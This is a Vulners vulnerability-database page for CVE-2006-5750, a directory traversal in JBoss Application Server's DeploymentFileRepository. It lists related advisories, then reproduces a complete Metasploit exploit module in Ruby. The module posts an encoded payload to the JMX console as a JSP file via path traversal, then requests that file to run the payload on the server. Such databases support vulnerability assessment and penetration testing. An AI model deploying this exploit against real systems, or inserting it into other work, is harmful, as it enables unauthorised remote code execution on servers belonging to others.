Vulners
Lucene search
JBoss Java Class DeploymentFileRepository Directory Traversal
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | JBoss JMX Console DeploymentFileRepository Directory Traversal File Manipulation | 14 Dec 200600:00 | – | nessus |
| JBoss Application Server (jbossas) JMX Console DeploymentFileRepository Traversal Arbitrary File Manipulation | 14 Dec 200600:00 | – | nessus |
| openSUSE 10 Security Update : jboss (jboss-2309) | 17 Oct 200700:00 | – | nessus |
| openSUSE 10 Security Update : jboss4 (jboss4-2304) | 17 Oct 200700:00 | – | nessus |
 | CVE-2006-5750 | 8 Dec 202314:30 | – | circl |
 | CVE-2006-5750 | 27 Nov 200620:00 | – | cve |
 | CVE-2006-5750 | 27 Nov 200620:00 | – | cvelist |
 | CVE-2006-5750 | 27 Nov 200620:07 | – | nvd |
 | RHSA-2006:0743 Red Hat Security Advisory: jbossas security update | 15 Sep 202416:27 | – | osv |
 | Critical: Red Hat Security Advisory: jbossas security update | 27 Nov 200615:42 | – | redhat |
10
`##
# $Id: jboss_deploymentfilerepository.rb 9246 2010-05-07 22:28:37Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'JBoss Java Class DeploymentFileRepository Directory Traversal',
'Description' => %q{
This module exploits a directory traversal vulnerability in the DeploymentFileRepository
class in JBoss Application Server (jbossas) 3.2.4 through 4.0.5. This vulnerability
allows remote authenticated (and unathenticated) users to read or modify arbitrary files,
and possibly execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9246 $',
'References' =>
[
[ 'CVE', '2006-5750' ],
[ 'BID', '21219' ]
],
'Privileged' => false,
'Platform' => [ 'linux' ],
'Targets' =>
[
[ 'Universal',
{
'Arch' => ARCH_JAVA,
'Payload' =>
{
'DisableNops' => true,
},
}
],
],
'DisclosureDate' => 'Nov 27 2006',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8080),
OptString.new('SHELL', [ true, "The system shell to use.", '/bin/sh']),
OptString.new('URI', [ true, "The system shell to use.", '/jmx-console/']),
OptString.new('PATH', [ true, "The URI path of the console.", '../jmx-console.war/'])
], self.class)
end
def exploit
fname = rand_text_alpha_upper(rand(5) + 1)
res = send_request_cgi(
{
'uri' => '/jmx-console/HtmlAdaptor',
'method' => 'POST',
'data' => 'action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=' +
Rex::Text.uri_encode(datastore['PATH']) + '&arg1=' + fname + '&arg2=.jsp&arg3=' +
Rex::Text.uri_encode(payload.encoded) + '&arg4=True',
})
if (res.code == 200)
print_status("Triggering payload...")
send_request_raw(
{
'uri' => datastore['URI'] + fname + '.jsp',
'method' => 'GET',
})
else
print_error("Denied...")
end
handler
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 May 2010 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.2275